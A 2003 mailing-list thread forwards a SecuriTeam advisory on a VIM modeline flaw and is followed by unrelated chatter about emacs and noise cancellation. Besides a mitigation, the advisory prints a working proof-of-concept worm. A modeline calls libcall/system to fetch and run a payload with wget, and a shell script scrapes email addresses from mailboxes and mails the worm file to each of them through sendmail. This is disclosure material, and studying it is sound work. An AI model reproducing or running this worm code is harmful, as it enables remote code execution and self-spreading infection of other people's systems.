Loading ...
Sorry, an error occurred while loading the content.

The First VIM Worm

Expand Messages
  • Muli Ben-Yehuda
    Hee hee. Comparison of VIM to a certain proprietary office product now certainly come to mind. Your friendly neighbourhood troll, Muli. ... Date: 21 Jan 2003
    Message 1 of 4 , Jan 21, 2003
    • 0 Attachment
      Hee hee. Comparison of VIM to a certain proprietary office product now
      certainly come to mind.

      Your friendly neighbourhood troll,
      Muli.

      ----- Forwarded message from support@... -----

      Date: 21 Jan 2003 16:38:42 +0200
      From: support@...
      X-Mailer: Beyond Security Mailer
      To: list@...
      Subject: [UNIX] The First VIM Worm

      The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
      - - promotion

      Beyond Security would like to welcome Tiscali World Online
      to our service provider team.
      For more info on their service offering IP-Secure,
      please visit http://www.worldonline.co.za/services/work_ip.asp
      - - - - - - - - -



      The First VIM Worm
      ------------------------------------------------------------------------


      SUMMARY

      A vulnerability in VIM has been found by Georgi Guninski that allows a
      remote attacker to cause the execution of arbitrary code whenever an
      unsuspecting user will open a text file. This is vulnerability can be
      further extended into a worm as illustrated below.

      DETAILS

      Protection:
      Put the following in your ~/.vimrc or better in a system wide config file:
      set modelines=0

      It disables modelines without breaking significant functionality - there
      is no compatibility in this stuff between vim and emacs anyway.

      Even when/if vim is fixed Georgi Guninski strongly recommends keeping this
      solution to prevent from similar exploits in the future.

      Emacs addicts are recommended to disable local variables which may pose
      similar threat by putting the following in ~/.emacs
      ;; disable local variables
      (setq enable-local-variables nil)

      How it works:
      There is a little bug in vi, which allows command execution.

      The following two lines execute the ls command on target host, if the file
      is opened with vim. (Try it out with "vi viexpl.txt").

      (In all of the below examples, the letter I of vim has been replaced with
      an !)

      /* v!m:set foldmethod=expr: */
      /* v!m:set
      foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */

      The output is:
      -- START OF OUTPUT --
      "viexpl.txt" 2L, 113CREADME TODO commands.sh commands.sh.long
      mail.txt proof.txt test.txt viexpl.txt viworm.txt worm.sh

      ms_sux:
      -- END OF OUTPUT

      The worm use this bug to download a file to the /tmp directory.

      -- START OF VIWORM FILE --
      /* v!m:set foldmethod=expr: */
      /* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","cd\
      /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\
      /tmp/joni8172ff3g;/tmp/joni8172ff3g"),"ms_sux"): */
      -- END OF VIWORM FILE --

      The above file does:
      * Change to /tmp
      * Download file joni8172ff3g to /tmp with wget from 127.0.0.1 (Change the
      IP to your webserver 127.0.0.1 is localhost).

      * Make it executable with chmod 0755

      * Execute the file

      Here is the code of the downloaded file:
      -- START OF FILE --
      echo 'JuliaBabe1234@...'>>/var/spool/mail/$USER;echo
      'CharlesBob1234@...'>>~/mbox;cat ~/mbox /var/spool/mail/*|grep '@'|cut
      -d ' ' -f 2|grep '@'|grep -v '<'|grep -v '"'|grep -v ','|sort|uniq >
      /tmp/h0oVeR183257;for i in `cat /tmp/h0oVeR183257`;do echo -e
      "/usr/sbin/sendmail $i <<EOFF\nSubject: Hi\nContent-Type: text/plain;
      charset=us-ascii\nContent-Disposition: attachment;
      filename=\"concept.txt\"\n\n/* v!m:set foldmethod=expr: */\n/* v!m:set
      foldexpr=confirm(libcall(\"/lib/libc.so.6\",\"system\",\"cd\ /tmp;wget\
      127.0.0.1/joni8172ff3g;chmod\ 0755\
      /tmp/joni8172ff3g;/tmp/joni8172ff3g\"),\"ms_sux\"):
      */\n\nEOFF">/tmp/f33lOe18352;. /tmp/f33lOe18352 2> /dev/null;done
      -- END OF FILE --

      * Set fake address for /var/spool/mail/$USER (if file not exist).

      * Set fake address for ~/mbox (if file not exist).

      * Get mail address with grep, grep -v from ~/mbox and /var/spool/mail/*

      * Sort the stuff and make it unique (Only one file per address).

      * Send a mail with sendmail for every address with Subject Hi, and
      attachment the viworm file (concept.txt).

      * Execute all the stuff and send stderr to /dev/null

      If the other users open the mail with the vi editor the wormfile is
      downloaded and executed.


      ADDITIONAL INFORMATION

      Georgi Guninski's advisory can be found at:
      <http://www.guninski.com/vim1.html> http://www.guninski.com/vim1.html

      The information has been provided by Nostradamus and Georgi Guninski.



      ========================================


      This bulletin is sent to members of the SecuriTeam mailing list.
      To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@...
      In order to subscribe to the mailing list, simply forward this email to: list-subscribe@...


      ====================
      ====================

      DISCLAIMER:
      The information in this bulletin is provided "AS IS" without warranty of any kind.
      In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.




      ----- End forwarded message -----

      --
      Muli Ben-Yehuda

      http://www.mulix.org
    • Oleg Goldshmidt
      ... Spoken as a true emacs user ;-) Actually the potential possibility to use emacs local variables to execute viruses/worms, as mentioned in the advisory, was
      Message 2 of 4 , Jan 21, 2003
      • 0 Attachment
        Muli Ben-Yehuda <mulix@...> writes:

        > Hee hee. Comparison of VIM to a certain proprietary office product now
        > certainly come to mind.

        Spoken as a true emacs user ;-)

        Actually the potential possibility to use emacs local variables to
        execute viruses/worms, as mentioned in the advisory, was raised some
        years ago already. I have not kept track.

        --
        Oleg Goldshmidt | pub@...
      • Tzahi Fadida
        Does anyone knows if there is a possibility to use the computer sb with a simple or not simple microphone and outputing to an amplifier or to small speakers
        Message 3 of 4 , Jan 21, 2003
        • 0 Attachment
          Does anyone knows if there is a possibility to use the computer sb with a simple or not simple
          microphone and outputing to an amplifier or to small speakers (whichever works)
          to muffle the high background pitch that gets out from TVs and computers, and especially disk
          drives.
          even if your computer and every electric device in your appartment is off, you will still hear
          the high pitch sound from the entire neighbourhood. this pitch is considered in some places
          as noise pollution.
          i know that there are some external noise muffler for air conditioning systems, but i would really
          want to know if you can create a canceling noise to kill the noise pollution or at least subdue it.
          n.b in modern s.b you have the ability to mix this noise canceling on a different channel, but
          i gather the most problematic thing is to reprocess the noise fast enough or predicting it with
          accuracy.

          n.b 2 : i have little knowledge in frequencies and sounds, so u'll have to forgive me if my question
          is absurd.


          * - * - *
          Tzahi Fadida
          TzahiFadida@...
          Technion Email: Science@...
          My Cool Site: HTTP://WWW.My2Nis.Com
          * - * - * - * - * - * - * - * - * - *

          WARNING TO SPAMMERS: see at http://members.lycos.co.uk/my2nis/spamwarning.html
        • Ofir Carny
          There are such solutions, but AFAIK only with earphones. You see, because of the limited speed of sound, different places in your house will experience
          Message 4 of 4 , Jan 22, 2003
          • 0 Attachment
            There are such solutions, but AFAIK only with earphones. You see, because of the limited speed of sound, different places in your house will experience diffrent phases (and also amplitudes) of the noise, and it is hard to cancel them all at once. Plus, the canceling signal will also be at different phases (and amplitudes) - a whole mess.

            see http://headwize2.powerpill.org/projects/noise_prj.htm for an example of such a project.

            -----Original Message-----
            From: Tzahi Fadida [mailto:Tzahi_ML@...]
            Sent: Tuesday, January 21, 2003 7:12 PM
            To: hackers-il@yahoogroups.com
            Subject: [hackers-il] can u create a muffler using ur home sb.


            Does anyone knows if there is a possibility to use the computer sb with a simple or not simple
            microphone and outputing to an amplifier or to small speakers (whichever works)
            to muffle the high background pitch that gets out from TVs and computers, and especially disk
            drives.
            even if your computer and every electric device in your appartment is off, you will still hear
            the high pitch sound from the entire neighbourhood. this pitch is considered in some places
            as noise pollution.
            i know that there are some external noise muffler for air conditioning systems, but i would really
            want to know if you can create a canceling noise to kill the noise pollution or at least subdue it.
            n.b in modern s.b you have the ability to mix this noise canceling on a different channel, but
            i gather the most problematic thing is to reprocess the noise fast enough or predicting it with
            accuracy.

            n.b 2 : i have little knowledge in frequencies and sounds, so u'll have to forgive me if my question
            is absurd.


            * - * - *
            Tzahi Fadida
            TzahiFadida@...
            Technion Email: Science@...
            My Cool Site: HTTP://WWW.My2Nis.Com
            * - * - * - * - * - * - * - * - * - *

            WARNING TO SPAMMERS: see at http://members.lycos.co.uk/my2nis/spamwarning.html




            To unsubscribe from this group, send an email to:
            hackers-il-unsubscribe@egroups.com



            Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/


            **********************************************************************
            This email and attachments have been scanned for
            potential proprietary or sensitive information leakage.
            Vidius, Inc. Protecting Your Information from the Inside Out.
            www.vidius.com
            **********************************************************************
          Your message has been successfully submitted and would be delivered to recipients shortly.